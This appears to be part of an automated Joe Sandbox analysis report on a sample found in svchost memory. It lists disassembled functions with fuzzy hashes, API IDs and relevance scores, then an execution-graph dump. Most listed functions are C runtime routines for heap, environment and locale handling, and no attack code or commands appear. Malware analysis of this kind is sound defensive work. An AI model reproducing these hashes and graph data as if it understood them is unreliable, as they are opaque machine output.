                                                              • Instruction ID: 91175b491b7fc14e3f1a7658fd3bfdb3fb1216593f4870ebf483384664c1c76e
                                                              • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                              • Instruction Fuzzy Hash: 26619D33A00B84CAEB60DF65D48439D7BA1F398BACF084215EF4927B98DB39C595CB41
                                                              Function 0000026A879CAD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                              • String ID: csm$csm
                                                              • API String ID: 3896166516-3733052814
                                                              • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                              • Instruction ID: 893e4d8dc827b760fc59cebf5f18d00e76e891684a4649e14e6d9b3ac1800f38
                                                              • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                              • Instruction Fuzzy Hash: 2D51BF72100380CAEFB48F65958835D77A4F3D5BA5F188216EB8967BD5CB3AD490DF02
                                                              Function 0000026A8799A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071488023.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a87990000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                              • String ID: csm$csm
                                                              • API String ID: 3896166516-3733052814
                                                              • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                              • Instruction ID: 24b885a40865372f2d4962931c6dd4c13311282acb065aa2b8f2b100d7f859d2
                                                              • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                              • Instruction Fuzzy Hash: A251A032100380CAFBF48F25954839C77A0F355BA4F189216DB99A7BD5CB3AD490DF02
                                                              Function 0000026A87998405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071488023.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a87990000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentImageNonwritable__except_validate_context_record
                                                              • String ID: csm$f
                                                              • API String ID: 3242871069-629598281
                                                              • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                              • Instruction ID: 8bc6e4c2ed6fb3d0b116afd45bb950e03d86cb73ff22765c23392437f1fb0b44
                                                              • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                              • Instruction Fuzzy Hash: 8051DD327122009BFB94CF15E488F1C37A9F354B98F568168DA0A67788EB36D885CF07
                                                              Function 0000026A879983E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071488023.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a87990000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentImageNonwritable__except_validate_context_record
                                                              • String ID: csm$f
                                                              • API String ID: 3242871069-629598281
                                                              • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                              • Instruction ID: 6434e668c18de7f899a849f0e788a6f9301be5892d0fc4d1102cc1fdd749815e
                                                              • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                              • Instruction Fuzzy Hash: A1319C32211740AAF794DF11E888F1D77A9F740B98F568018EE5B67788DB3AC945CB06
                                                              Function 0000026A879D2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: FileWrite$ConsoleErrorLastOutput
                                                              • String ID:
                                                              • API String ID: 2718003287-0
                                                              • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                              • Instruction ID: 3076751dc3de790d1c224386df8ee1f4e5ab8c71f6f65ab3a3bed05673c9e6dc
                                                              • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                              • Instruction Fuzzy Hash: 88D10132B14A8089EB51CFB9D4483AC3FB1F754BD8F108216DE5DA7B99DA3AC446CB41
                                                              Function 0000026A879C14A4 Relevance: 6.3, APIs: 5, Instructions: 42memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$Free
                                                              • String ID:
                                                              • API String ID: 3168794593-0
                                                              • Opcode ID: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                              • Instruction ID: 8a01ecca636f93bdf911fe9301806ba74427497ad84442dbc2d131ee4094cafd
                                                              • Opcode Fuzzy Hash: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                              • Instruction Fuzzy Hash: 9F115B76604A91D6E794DFA6A80814D7FA0FB8AFC5F084025EA4963716EE39C451CB41
                                                              Function 0000026A879D2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: ConsoleErrorLastMode
                                                              • String ID:
                                                              • API String ID: 953036326-0
                                                              • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                              • Instruction ID: a659f95e0478c9a379e7c93a59f58379ea217171002cffd52b577c1c22c3c908
                                                              • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                              • Instruction Fuzzy Hash: 9391D032700A5085FBA0DF7594883AD3FA0F759B98F644109DE4A77A94DB7EC8C2CB02
                                                              Function 0000026A879C7960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                              • String ID:
                                                              • API String ID: 2933794660-0
                                                              • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                              • Instruction ID: 4e80524f35fcef7bad59f85813724d52d64db0f3f33ffe74409acc95bda1e77e
                                                              • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                              • Instruction Fuzzy Hash: A4115A32710F018AEB90DF60E8583AC37B4F31A758F440E21EA6D537A4EB78C1988780
                                                              Function 0000026A879C253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: FileType
                                                              • String ID: \\.\pipe\
                                                              • API String ID: 3081899298-91387939
                                                              • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                              • Instruction ID: 97ea5c88fb40b65250efba85239deb6fe808c8ef7dc44d6fea174178200e4e45
                                                              • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                              • Instruction Fuzzy Hash: E671B636200B8186EFB5DF25D8993AE77A4F3C9B84F550026DD0963B89DE36D685CB02
                                                              Function 0000026A87999E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071488023.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a87990000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CallTranslator
                                                              • String ID: MOC$RCC
                                                              • API String ID: 3163161869-2084237596
                                                              • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                              • Instruction ID: e083ef4e6a99dc2faf5a08287110857988fabb0183ff147dc1fcf3667f8f1dd1
                                                              • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                              • Instruction Fuzzy Hash: 33618B33A05B848AFBA0DFA5D48439D77B0F398B98F044215EF4927B98DB3AD595CB01
                                                              Function 0000026A879C2330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: FileType
                                                              • String ID: \\.\pipe\
                                                              • API String ID: 3081899298-91387939
                                                              • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                              • Instruction ID: a2f76bc1a186076cee4736489c3d4438f40eba79840f7ba633a66ebf323134d9
                                                              • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                              • Instruction Fuzzy Hash: EA51C43220478182FFB4DB2AA45C3AEBB91F3D5780F450125DE5A27B99DA3BC585CF42
                                                              Function 0000026A879D26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastWrite
                                                              • String ID: U
                                                              • API String ID: 442123175-4171548499
                                                              • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                              • Instruction ID: 5c34eae6179e8718e065711947d23fa5df45d25b207243dff04b03615aa00afe
                                                              • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                              • Instruction Fuzzy Hash: 8541A433715A8086DBA0DF25E8483ADBFA1F798794F944021EE4D97794EB7DC441CB41
                                                              Function 0000026A879C94A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFileHeaderRaise
                                                              • String ID: csm
                                                              • API String ID: 2573137834-1018135373
                                                              • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                              • Instruction ID: 516278ab517d9276ea0f4953800809262020678c9f6335137ecd7ce881f65308
                                                              • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                              • Instruction Fuzzy Hash: 3D112836214B8082EBA18B15E44835DBBE5FB99BA4F584225EF8C17B68DF3DC551CB00
                                                              Function 0000026A87997356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071488023.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a87990000_svchost.jbxd
                                                              Similarity
                                                              • API ID: __std_exception_copy
                                                              • String ID: ierarchy Descriptor'$riptor at (
                                                              • API String ID: 592178966-758928094
                                                              • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                              • Instruction ID: 290368697319c93d0959a6d4aceff4e73c937a6d0c9df6ff90baa51795892e9d
                                                              • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                              • Instruction Fuzzy Hash: CFE08671741B4490DF418F21E88469C73A1DBA8B64F889122995C1B311FA38D1E9C702
                                                              Function 0000026A879973B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071488023.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a87990000_svchost.jbxd
                                                              Similarity
                                                              • API ID: __std_exception_copy
                                                              • String ID: Locator'$riptor at (
                                                              • API String ID: 592178966-4215709766
                                                              • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                              • Instruction ID: 57ea791ecea9af06e65d832b1adcba3d40aeefbf742ffe7567ba952dade77035
                                                              • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                              • Instruction Fuzzy Hash: 19E08671701B4490DF418F21E48069C7361E7A8B54F889122C94C1B311EA38D1E5C701
                                                              Function 0000026A879C1BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocFree
                                                              • String ID:
                                                              • API String ID: 756756679-0
                                                              • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                              • Instruction ID: 7016fa5795a79e5502fdc21d921c24760b1a256b601511705076004f3255fffb
                                                              • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                              • Instruction Fuzzy Hash: A8119175641B4482EE94DF66A40C22D7BA1FBCAFC0F184025EE4D63766EF3AC442C741
                                                              Function 0000026A879C1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocProcess
                                                              • String ID:
                                                              • API String ID: 1617791916-0
                                                              • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                              • Instruction ID: b1c6b37d2b3670007f77e6ad3635e51a98d0f2eb219863f2620388776d6560d5
                                                              • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                              • Instruction Fuzzy Hash: 08E06D3560160486EB44CFA2D80C34E3EE1FB8AF86F04C024C90907351DF7EC499CB51

                                                              Execution Graph

                                                              Execution Coverage:0.8%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:471
                                                              Total number of Limit Nodes:3
                                                              execution_graph 14923 179537ac0e4 14924 179537ac0fd 14923->14924 14925 179537ac0f9 14923->14925 14938 179537aec90 14924->14938 14930 179537ac11b 14969 179537ac158 14930->14969 14931 179537ac10f 14964 179537ad744 14931->14964 14935 179537ad744 __free_lconv_num 5 API calls 14936 179537ac142 14935->14936 14937 179537ad744 __free_lconv_num 5 API calls 14936->14937 14937->14925 14939 179537ac102 14938->14939 14940 179537aec9d 14938->14940 14944 179537af1ec GetEnvironmentStringsW 14939->14944 14988 179537acefc 14940->14988 14942 179537aeccc 15005 179537ae968 14942->15005 14945 179537ac107 14944->14945 14946 179537af21c 14944->14946 14945->14930 14945->14931 14947 179537af10c WideCharToMultiByte 14946->14947 14948 179537af26d 14947->14948 14949 179537af274 FreeEnvironmentStringsW 14948->14949 14950 179537aca0c 5 API calls 14948->14950 14949->14945 14951 179537af287 14950->14951 14952 179537af298 14951->14952 14953 179537af28f 14951->14953 14955 179537af10c WideCharToMultiByte 14952->14955 14954 179537ad744 __free_lconv_num 5 API calls 14953->14954 14956 179537af296 14954->14956 14957 179537af2bb 14955->14957 14956->14949 14958 179537af2c9 14957->14958 14959 179537af2bf 14957->14959 14960 179537ad744 __free_lconv_num 5 API calls 14958->14960 14961 179537ad744 __free_lconv_num 5 API calls 14959->14961 14962 179537af2c7 FreeEnvironmentStringsW 14960->14962 14961->14962 14962->14945 14965 179537ad749 HeapFree 14964->14965 14966 179537ad77a 14964->14966 14965->14966 14967 179537ad764 __free_lconv_num 14965->14967 14966->14925 14968 179537ad6ac __free_lconv_num 4 API calls 14967->14968 14968->14966 14970 179537ac17d 14969->14970 14971 179537ad6cc __free_lconv_num 5 API calls 14970->14971 14984 179537ac1b3 14971->14984 14972 179537ac1bb 14973 179537ad744 __free_lconv_num 5 API calls 14972->14973 14974 179537ac123 14973->14974 14974->14935 14975 179537ac22e 14976 179537ad744 __free_lconv_num 5 API calls 14975->14976 14976->14974 14977 179537ad6cc __free_lconv_num 5 API calls 14977->14984 14978 179537ac21d 15455 179537ac268 14978->15455 14982 179537ad744 __free_lconv_num 5 API calls 14982->14972 14983 179537ac253 14985 179537ad590 _invalid_parameter_noinfo 10 API calls 14983->14985 14984->14972 14984->14975 14984->14977 14984->14978 14984->14983 14986 179537ad744 __free_lconv_num 5 API calls 14984->14986 15446 179537ac6e8 14984->15446 14987 179537ac266 14985->14987 14986->14984 14989 179537acf28 FlsSetValue 14988->14989 14990 179537acf0d FlsGetValue 14988->14990 14991 179537acf35 14989->14991 14994 179537acf1a 14989->14994 14992 179537acf22 14990->14992 14990->14994 15028 179537ad6cc 14991->15028 14992->14989 14994->14942 14996 179537acf62 FlsSetValue 14999 179537acf80 14996->14999 15000 179537acf6e FlsSetValue 14996->15000 14997 179537acf52 FlsSetValue 14998 179537acf5b 14997->14998 15001 179537ad744 __free_lconv_num 5 API calls 14998->15001 15032 179537acb94 14999->15032 15000->14998 15001->14994 15004 179537ad744 __free_lconv_num 5 API calls 15004->14994 15175 179537aebd8 15005->15175 15010 179537ae9ba 15010->14939 15013 179537ae9d3 15014 179537ad744 __free_lconv_num 5 API calls 15013->15014 15014->15010 15015 179537ae9e2 15015->15015 15194 179537aed0c 15015->15194 15018 179537aeade 15019 179537ad6ac __free_lconv_num 5 API calls 15018->15019 15021 179537aeae3 15019->15021 15020 179537aeb39 15027 179537aeba0 15020->15027 15205 179537ae498 15020->15205 15022 179537ad744 __free_lconv_num 5 API calls 15021->15022 15022->15010 15023 179537aeaf8 15023->15020 15024 179537ad744 __free_lconv_num 5 API calls 15023->15024 15024->15020 15026 179537ad744 __free_lconv_num 5 API calls 15026->15010 15027->15026 15031 179537ad6dd __free_lconv_num 15028->15031 15030 179537acf44 15030->14996 15030->14997 15031->15030 15036 179537ad6ac 15031->15036 15033 179537acc46 __free_lconv_num 15032->15033 15055 179537acaec 15033->15055 15035 179537acc5b 15035->15004 15039 179537acfa0 15036->15039 15038 179537ad6b5 15038->15030 15042 179537acfb5 __free_lconv_num 15039->15042 15040 179537acfe1 FlsSetValue 15041 179537acff3 15040->15041 15045 179537acfd1 __CxxCallCatchBlock 15040->15045 15043 179537ad6cc __free_lconv_num HeapFree 15041->15043 15042->15040 15042->15045 15044 179537ad002 15043->15044 15046 179537ad020 FlsSetValue 15044->15046 15047 179537ad010 FlsSetValue 15044->15047 15045->15038 15049 179537ad02c FlsSetValue 15046->15049 15050 179537ad03e 15046->15050 15048 179537ad019 15047->15048 15051 179537ad744 __free_lconv_num HeapFree 15048->15051 15049->15048 15052 179537acb94 __free_lconv_num HeapFree 15050->15052 15051->15045 15053 179537ad046 15052->15053 15054 179537ad744 __free_lconv_num HeapFree 15053->15054 15054->15045 15056 179537acb08 15055->15056 15059 179537acd7c 15056->15059 15058 179537acb1e 15058->15035 15060 179537acdc4 Concurrency::details::SchedulerProxy::DeleteThis 15059->15060 15061 179537acd98 Concurrency::details::SchedulerProxy::DeleteThis 15059->15061 15060->15058 15061->15060 15063 179537b07b4 15061->15063 15064 179537b07d7 15063->15064 15065 179537b0850 15063->15065 15064->15065 15069 179537b0816 15064->15069 15074 179537ad744 __free_lconv_num 5 API calls 15064->15074 15066 179537b08a3 15065->15066 15068 179537ad744 __free_lconv_num 5 API calls 15065->15068 15129 179537b0954 15066->15129 15070 179537b0874 15068->15070 15071 179537b0838 15069->15071 15077 179537ad744 __free_lconv_num 5 API calls 15069->15077 15072 179537ad744 __free_lconv_num 5 API calls 15070->15072 15073 179537ad744 __free_lconv_num 5 API calls 15071->15073 15075 179537b0888 15072->15075 15079 179537b0844 15073->15079 15080 179537b080a 15074->15080 15076 179537ad744 __free_lconv_num 5 API calls 15075->15076 15081 179537b0897 15076->15081 15082 179537b082c 15077->15082 15078 179537b090e 15083 179537ad744 __free_lconv_num 5 API calls 15079->15083 15089 179537b2fc8 15080->15089 15086 179537ad744 __free_lconv_num 5 API calls 15081->15086 15117 179537b30d4 15082->15117 15083->15065 15085 179537ad744 5 API calls __free_lconv_num 15088 179537b08af 15085->15088 15086->15066 15088->15078 15088->15085 15090 179537b2fd1 15089->15090 15115 179537b30cc 15089->15115 15091 179537b2feb 15090->15091 15092 179537ad744 __free_lconv_num 5 API calls 15090->15092 15093 179537b2ffd 15091->15093 15095 179537ad744 __free_lconv_num 5 API calls 15091->15095 15092->15091 15094 179537b300f 15093->15094 15096 179537ad744 __free_lconv_num 5 API calls 15093->15096 15097 179537b3021 15094->15097 15098 179537ad744 __free_lconv_num 5 API calls 15094->15098 15095->15093 15096->15094 15099 179537b3033 15097->15099 15100 179537ad744 __free_lconv_num 5 API calls 15097->15100 15098->15097 15101 179537ad744 __free_lconv_num 5 API calls 15099->15101 15102 179537b3045 15099->15102 15100->15099 15101->15102 15103 179537b3057 15102->15103 15104 179537ad744 __free_lconv_num 5 API calls 15102->15104 15105 179537b3069 15103->15105 15106 179537ad744 __free_lconv_num 5 API calls 15103->15106 15104->15103 15107 179537b307b 15105->15107 15108 179537ad744 __free_lconv_num 5 API calls 15105->15108 15106->15105 15109 179537b308d 15107->15109 15110 179537ad744 __free_lconv_num 5 API calls 15107->15110 15108->15107 15111 179537b30a2 15109->15111 15112 179537ad744 __free_lconv_num 5 API calls 15109->15112 15110->15109 15113 179537b30b7 15111->15113 15114 179537ad744 __free_lconv_num 5 API calls 15111->15114 15112->15111 15113->15115 15116 179537ad744 __free_lconv_num 5 API calls 15113->15116 15114->15113 15115->15069 15116->15115 15118 179537b313a 15117->15118 15120 179537b30d9 15117->15120 15118->15071 15119 179537b30f2 15122 179537b3104 15119->15122 15123 179537ad744 __free_lconv_num 5 API calls 15119->15123 15120->15119 15121 179537ad744 __free_lconv_num 5 API calls 15120->15121 15121->15119 15124 179537b3116 15122->15124 15126 179537ad744 __free_lconv_num 5 API calls 15122->15126 15123->15122 15125 179537b3128 15124->15125 15127 179537ad744 __free_lconv_num 5 API calls 15124->15127 15125->15118 15128 179537ad744 __free_lconv_num 5 API calls 15125->15128 15126->15124 15127->15125 15128->15118 15130 179537b0959 15129->15130 15131 179537b0985 15129->15131 15130->15131 15135 179537b3174 15130->15135 15131->15088 15134 179537ad744 __free_lconv_num 5 API calls 15134->15131 15136 179537b097d 15135->15136 15137 179537b317d 15135->15137 15136->15134 15171 179537b3140 15137->15171 15140 179537b3140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 15141 179537b31a6 15140->15141 15142 179537b3140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 15141->15142 15143 179537b31b4 15142->15143 15144 179537b3140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 15143->15144 15145 179537b31c2 15144->15145 15146 179537b3140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 15145->15146 15147 179537b31d1 15146->15147 15148 179537ad744 __free_lconv_num 5 API calls 15147->15148 15149 179537b31dd 15148->15149 15150 179537ad744 __free_lconv_num 5 API calls 15149->15150 15151 179537b31e9 15150->15151 15152 179537ad744 __free_lconv_num 5 API calls 15151->15152 15153 179537b31f5 15152->15153 15154 179537b3140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 15153->15154 15155 179537b3203 15154->15155 15156 179537b3140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 15155->15156 15157 179537b3211 15156->15157 15158 179537b3140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 15157->15158 15159 179537b321f 15158->15159 15160 179537b3140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 15159->15160 15161 179537b322d 15160->15161 15162 179537b3140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 15161->15162 15163 179537b323c 15162->15163 15164 179537ad744 __free_lconv_num 5 API calls 15163->15164 15165 179537b3248 15164->15165 15166 179537ad744 __free_lconv_num 5 API calls 15165->15166 15167 179537b3254 15166->15167 15168 179537ad744 __free_lconv_num 5 API calls 15167->15168 15169 179537b3260 15168->15169 15170 179537ad744 __free_lconv_num 5 API calls 15169->15170 15170->15136 15172 179537b3167 15171->15172 15173 179537b3156 15171->15173 15172->15140 15173->15172 15174 179537ad744 __free_lconv_num 5 API calls 15173->15174 15174->15173 15176 179537aebfb 15175->15176 15177 179537aec05 15176->15177 15178 179537ad744 __free_lconv_num 5 API calls 15176->15178 15179 179537ae99d 15177->15179 15180 179537acefc 10 API calls 15177->15180 15178->15177 15183 179537ae668 15179->15183 15181 179537aeccc 15180->15181 15182 179537ae968 45 API calls 15181->15182 15182->15179 15217 179537ae1b4 15183->15217 15186 179537ae688 GetOEMCP 15188 179537ae6af 15186->15188 15187 179537ae69a 15187->15188 15189 179537ae69f GetACP 15187->15189 15188->15010 15190 179537aca0c 15188->15190 15189->15188 15193 179537aca1b __free_lconv_num 15190->15193 15191 179537ad6ac __free_lconv_num 5 API calls 15192 179537aca55 15191->15192 15192->15013 15192->15015 15193->15191 15193->15192 15195 179537ae668 17 API calls 15194->15195 15196 179537aed39 15195->15196 15197 179537aed76 IsValidCodePage 15196->15197 15203 179537aee8f 15196->15203 15204 179537aed90 15196->15204 15199 179537aed87 15197->15199 15197->15203 15201 179537aedb6 GetCPInfo 15199->15201 15199->15204 15200 179537aead5 15200->15018 15200->15023 15201->15203 15201->15204 15291 179537a7940 15203->15291 15280 179537ae780 15204->15280 15207 179537ae4b4 15205->15207 15206 179537ad6ac __free_lconv_num 5 API calls 15208 179537ae550 